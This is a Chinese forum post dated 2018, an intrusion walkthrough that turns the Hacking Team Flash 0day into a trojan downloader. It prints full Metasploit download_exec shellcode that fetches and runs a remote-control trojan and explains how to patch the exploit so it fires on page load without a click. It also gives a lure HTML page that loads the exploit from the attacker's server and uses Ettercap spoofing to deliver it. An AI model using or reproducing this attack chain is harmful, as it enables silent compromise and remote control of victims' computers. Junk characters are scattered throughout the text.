|
" K) w) G# U6 B 三、flash 0day之手工代码修改制作下载者实例入侵演示
% S h# x: a+ E/ P 0 ?4 Y/ \, }8 v( M0 L3 x6 O
% Z0 V) [, w2 Q
利用到的工具: / c0 Z1 Z, n0 k2 w
2 W7 A) b2 ?- n( S5 ^3 j: N2 z/ N B/ {
$ { {+ v4 o4 u' @& H4 U- i8 ^ Msf
7 E9 ^' S' i. U p3 w i 6 F6 r5 f* P; e4 `7 C/ J& L
* G" ]( t$ \6 s& O Ettercap
$ h" ~6 u, x5 [' M& G5 Z& T: N3 A % D% E. b5 f X& T: l5 I r
' V$ I5 d2 Q9 h( e- p% D, G! Y/ `9 M
Adobe Flash CS6 7 a$ o9 g' p9 \) e0 u. L
& x0 C4 _# `, U# b F) @
) w j5 L# H( M Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 - s6 ~" H7 P6 M3 i9 L
0 ~; Q' i& n0 [ @/ Y2 P0 Q: Z2 j: f$ }; j2 R( O
下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options $ }5 @1 r# [/ `
( J$ a& I5 U' ^$ U& d
: s- k4 Z1 ]7 d' r% t 如图: 5 J- E) x4 K$ Z+ d) b7 I# X$ }
. J8 B$ p/ M# N' O" G D* t$ J
1 ` w8 h5 u9 r+ K
2 f A5 i% y6 x. [/ j1 C
( T: c$ M1 Q, R5 [1 G# m" O8 @% \8 F" R2 k( p" ~" o2 c6 J
 6 P Z" V: j! x1 Y$ ~! F: L
. y+ I# z% G& A
! K% g' P+ X6 c$ f2 a3 A 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: ' J9 g0 L Q3 T7 K, N; ~+ P8 t N
4 x7 Y$ k. q, e. ^2 k6 o
5 Q- j: h) C0 P9 |3 }* i9 W: M # i* o, T& u4 D2 i
" ?( o3 }0 p [( w F; [: j, Q/ `9 Y2 q7 ?$ n" c
 / t! K4 _; y7 \% L
" x4 K' k# B$ m6 V: {8 b
+ l7 X- ?( q1 P 然后执行generate -t dword生成shellcode,如下: ! e) _( I. J1 R" M4 h: k
E8 v {- P- g& O4 ?, B# ~- L0 t
 ( h" w! I9 @1 M0 ~
% u8 J* z5 Z" V3 O, h/ E3 O
6 M0 n- {" a- |9 e, C 复制代码到文本下便于我们一会编辑flash exp,如下:
- k. X0 n) ^+ |: y0 D
, D" N- X- S6 ^
?" n* q* E z& T" e( f/ b 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31,
- N3 S" ?/ D+ X
% o% {9 K+ J8 a
; ?! B5 |- R/ l6 n% N# X 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0,
$ k# K' T! ?8 ?3 o- j
! K) N5 n' p. G/ C. [0 O O8 j! o: w3 F/ Q4 q
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, 3 W0 z5 [! u, x3 ?( R* C. v$ w$ l i
" E* H' a# Z3 b
4 k% z$ E8 u# L* e" B 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489,
1 _4 N( |7 ^% U, x% H2 s( ` ! [( ?5 `5 [6 R" S& _, r. `
. A6 {% Y* f' B2 @( X0 L$ S( P 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
" c" v4 l/ a! f1 `1 z' a 9 {5 f# _, [% k+ B' [3 T
9 E$ E# U; j+ E y' l 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
( S$ Q1 Z6 J; f; d* t6 q% n8 ]
1 N9 H$ O& P7 \+ F0 m- {& M% |: n/ R0 ~8 d
0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 2 f3 ~+ t6 V( E
4 S8 V6 o% _$ _% e8 s. w
1 ^6 b0 A/ X( L3 e4 ]2 @; A3 R
0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, ; Z& {5 h7 R; Q; C
- E9 d. } u7 u J- X' q2 t
: F0 R3 [! m; t6 H6 a* a 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, / L- n' O7 |5 N4 P' n
) [# c5 l# I! P, s* O$ g1 r7 i
4 Z7 F/ X( B! r+ B9 E 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, # f4 Z; H+ o* a- w" m
8 _* u8 h! g; j, v+ u$ d# _5 [4 r# N: A& f9 i! a) S0 N4 Q
0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, # x* M1 j; t2 \( @/ h) T
7 \& k: S) t8 c( E. J6 b
8 [4 O7 H4 f2 a1 t& [ 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853,
. T0 q" o. k; ^- p 8 |% n U; H; D1 `4 d* b
! i! d6 Y/ m; _1 v6 W9 |2 {' s0 \ 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, 8 H; @0 R( T. C, S" l
& V- o9 u/ I, g; l! C
# D- p* U' d0 |) Q" B
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 ) h; j+ m) L/ J/ `* b$ p# K, w
- E# ~; k* ?( h5 n# V7 U0 J9 `) ^- u' |, f+ w8 z
0 D; j3 M4 J4 x
. b1 T* D: ]# v* U% K+ `) x. ?0 _
% l# ]/ X) P+ p% ]0 H8 I+ M0 n( u2 h
! W) R$ A4 l8 W# G, ]' g0 J
7 _* l( W' O6 }/ T {; p% K% c4 l1 e4 M/ j, |. B( N" N6 r
下面我们来修改flash 0day exp,需要修改三个文件,分别为: 4 p7 Y: Y$ M5 J8 n8 m. y# m0 n: \1 b3 }
8 i& q+ a% B( F) v$ d; r
0 z% g# K' ~# W1 K, Q; J* z8 _
 + g# l3 n4 I( d* y" _- I
! t0 |- A+ j; S2 h0 |
- Q% W( l! e' `
先修改ShellWin32.as,部分源代码如图: * ]! M' t, q7 j2 j2 e7 h
# m7 \ ?% u M. O6 ?
8 ^3 h0 A i2 R- u! {7 |  - V! h( E2 C; _, B; I3 k4 p
' @2 f; [7 T0 T7 A& ^
* f" @- K0 r" g" X 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: ( n- J" Z P0 U8 \
1 ^0 v) @9 E( A/ U& Q6 l2 j. S8 _& V6 A" [# `9 H/ p/ x
- v/ i2 e, H: O7 I( u4 B 8 X; c0 M# r" d2 R* g' P
4 x# l$ K; _/ w! P ^ 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: " g/ N9 J. U; l1 t0 f
+ u9 x' n/ M l7 R
% p. b! I& o- N/ Y2 d  - ^4 [$ L4 F7 b3 z3 l
0 B0 D( m- G' F" B
" M- N8 T& @, b: L+ C 换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
3 U5 o' x7 l8 y/ d* | / D# E2 O4 l7 d0 u, J
2 D5 @/ |! b0 V6 b
9 S; j. q5 p" G 9 b8 q7 }0 q+ ?) a6 Y
8 z0 ^; O% ^( K
9 M% k2 g& j" Z4 ~1 X; P0 L
2 r7 \9 D) C, q \
+ o4 h; U4 H. ]' }: b# c  6 C" Q, l$ A6 v* B2 C
+ x: c$ v! s4 d9 f0 [ P6 n4 S
# s) T5 P% n, i' P2 a
然后点保存,下面我们来编译一下,打开
3 F# c7 ~3 x& \8 j% x% @
2 @1 d1 A# A b5 ?
) k2 N8 g- X" Q1 l1 [ exp1.fla然后点文件-发布,看看编译没错误 % ^4 b( x- u C3 B- A7 }! ~
$ O& O F$ g+ Z- v# T
1 Y9 O# R0 v4 q+ P3 k3 w M2 U J0 n
2 D! E; [. A( N9 O. q, e 0 K% g' r# Y/ d2 A; ^ t
8 C' Q0 ]1 R0 k& @! c: f & \% {2 N, }4 R' S. s. b
( h) H8 M/ M; v4 f0 F
. ?8 i# x0 P% m( o% F! w
! o) T& W2 }6 `) f+ S3 n8 g- u
( \4 L" ], h- C: f/ M* a
) \3 Z5 e6 A' ~. k Z1 K% V 
/ U4 K* o/ }. H# T$ I. t - I8 K4 P. I9 n t
# x7 e' s" s: S3 P: n; D, S 然后我们把生成的 " s, i8 a/ n: j" u/ D1 o
1 j, z: u2 ]3 f( ]: Z1 U
1 z& v0 A! }' ~3 x
exp1.swf丢到kailinux 的/var/www/html下:
( N0 e/ X0 O! t% `$ ~5 m- j, O % R( E! }+ T3 y1 d6 u/ `- {
/ h( l4 E7 t; k* j: O. n3 n 然后把这段代码好好编辑一下
" T1 m) w8 J5 @2 c
' j$ p: U- S7 _% R
7 e! U. e! w' S2 M e
9 D l- I- h1 F5 G1 H
5 } G! C6 c! o/ \7 x# F
2 X) @: W, x$ t; ? + E. J: a8 R4 ^$ l
+ t+ r* b/ B+ y6 [4 w" I1 W% r, V9 W& C/ ^9 f+ s' Z' q* f# j6 m
2 E+ W F$ J; F8 ~
1 y6 N/ h/ p5 j& K! p4 b
# A: u ~& d! ]8 k% q1 w' w1 C
# i i1 F% E6 w- n* g/ X* v4 ?! R( D
8 S& ?' F b- o6 O0 U3 m" M' y# e# X4 f( x# H
/ y4 h! l I, b4 a5 _; \( ?
! @8 }' D* g- Q7 F( A4 m! @4 g' V) a8 _+ O8 {0 K0 b
' C: J+ b, ?' c; v6 B
- u9 r8 |& x2 M7 ]5 i# p+ H4 n! T* j8 z# O4 K8 {) n
<!DOCTYPE html>
" F3 `( \% a" A 2 V' D: s8 J; C8 _
: v2 `; f" w! F6 M
<html> / j/ Z, y6 Z+ [ O6 N) L5 ?- L
0 l, s* `: J$ b. u7 }
4 U' E: Z( Y% U9 J( {: ?; x/ A <head>
* d* Z. `& l/ G6 d0 {, I4 ~. _ ; w# I4 v8 j2 u# ]
! x) O2 L% X) r3 f <meta http-equiv="Content-Type" content="text/html;
Q1 \' N, S/ V6 e2 |7 n
~/ e$ @ O+ R e2 h. m- Q6 q- O5 y# E7 _. [1 c
charset=utf-8"/>
0 m8 Z" t5 q, T
! b' h. z: ?1 p- b5 n" f5 K
! A7 s7 z, W1 n( q# E- w- W" B. Z </head> " [3 L' s4 {# Q% i1 F; V
' ~: K) y; q2 U8 c5 z- K) d) I
5 Z- B2 O. w. g% E <body> C A" R9 b2 |$ [8 U( I3 P4 ~+ S
3 i2 `, C; {0 ~$ y" L' o0 I# k: b$ ?% V& Z7 a& c+ k
<h2> Please wait, the requested page is loading...</h2> N& \! H" K1 P9 p2 H
1 k2 N5 n" w: y6 |. j/ d
' N: }# f/ s: P; {7 d; ^
<br> " g/ x. m, L7 {+ f/ K7 }( y
+ n0 T4 L C/ O& t7 V
: b5 g/ [2 k/ D( I7 f! f
<OBJECT
% l! _+ @% X8 ]* `1 J( j' D , n5 q+ Y; g6 @; i! r7 J K
6 ^& [9 e8 w# t9 q" a+ ?' _1 ^
classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie * I. g" }; O6 D. a' X
2 d) `, ?5 \) \) e$ n5 e! _
. J X! W, \& G) i2 J. G' C VALUE="http://192.168.0.109/exp1.swf"></OBJECT> * |: ^- W+ r' V1 Q) L
' w$ n# ]$ B( J7 `: B6 V5 [# z c2 y
</body> , A. U# m+ b# a3 N, c
$ I: Q$ I! r0 M( ^
0 ?6 L O) O( s2 S. z <script>
2 l1 a# h" {4 Q' k" R5 W, A8 ^2 K
' O4 Q9 L8 z6 m# k% A; T4 N
/ x6 E- ^5 R& w; U setTimeout(function () {
% j9 ] \2 I6 o+ c # h& s0 H' Q" W/ A
( q+ @6 Z( w6 W; m$ @( ^5 \0 m5 x2 U. ?
M3 D# [0 k/ d( q 2 |0 r( D0 |: W5 S9 x
3 t9 y. y" m) u2 ? window.location.reload();
: O! W7 V1 f5 b 2 W N5 n" r5 i+ i
" s. _* P n1 e+ o$ m
}, 10000);
, M6 k# a/ d+ \ - x+ R2 l2 l1 D4 \, A" @. A z* J
+ F3 x/ M9 r D0 _" I
& z0 O+ d4 f/ L. ^5 ^) i# F8 w
0 J3 b- h+ l; E2 W" i# q
$ t7 |; ~# a0 w: e: P2 l8 n
</script> 3 Z2 m Z# M9 e3 p) m( h
* F& I9 N* C2 D1 Q
. M, O! Y3 L5 D6 p. v
</html> - E$ Y1 {- Y4 s$ l
: g: P$ }0 d9 U0 S6 f
3 }+ l+ H) l- s# y
/ n/ V \" X% \
! ?" C' h6 @/ H* r) I6 s
) p4 M: f- ]; B: ^$ j: h 注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
; ~' H/ y- N x8 V5 z; s
. F& F6 F" ~1 m. P3 B& R. R
! _4 \+ m! ~% E, d: A! w  5 O7 p# `: d* X
" x; j2 H" S4 A8 i
8 W2 X- ~: S3 u! b& W( c5 M
F* K, R' y0 Q. C, n0 m3 `0 C F 5 J- Z' K- e- `6 q* p& l$ Y
! K* N5 m2 m; b5 _; {2 R% R
1 V$ t. D" `6 j
4 q8 q% u$ u* `* l+ S% {% u' ~3 m5 _; ?% A7 e) K# ?% a
, s- x$ g6 ^6 j4 I% O3 n9 J" ?
5 u1 ]1 e* \! q# k: y o% M9 U0 j/ q
) o( w( M( a' D9 Y# F" q 2 w# L, r, m' j8 A5 J4 \5 x/ Q+ ~5 ~
% s8 Q4 j0 `% t- y5 z 下面我们用ettercap欺骗如图: * S" K* J9 \, j$ c- D+ j
7 u2 p1 X; N( r- X5 N9 S: Y
! I3 T* |1 C% E- G, X$ o; c
 ) N9 }" ~. s. p% s3 q0 D0 M
|2 P( M: g. Y( j) r
: |% ]/ p2 U/ k) q& k
+ \9 u/ Q" [" R1 v: C# Z: H 2 d( f9 V: r$ s/ C3 }: a
) r9 ]5 Y5 Q" k; a. K 下面我们随便访问个网站看看:
k8 P* T, n9 Y% } " S* ?8 t3 i3 h, ]! t
. T# h4 \8 O; f' o
我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图:
* w& [9 n" n5 u: y3 y! x, X/ c: N& Y# R
( j, n {1 v! O% y1 u$ E! c; f) }8 a+ `6 n, }" B+ I* \5 t
 " U E- V1 b/ E* j/ N7 ?
5 ?; H' y& X$ Z q0 o* t
3 Y; b7 a+ G8 z. b- G 我们看另一台, , ~2 ~6 a0 d) @
. v Z" X" k$ O4 M$ f) y
$ T, E6 ^# x. \& K/ D+ s
提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。
9 a+ W/ U, B/ }4 ]1 ` | 
发表于 2018-10-20 20:28:55
收藏
支持
反对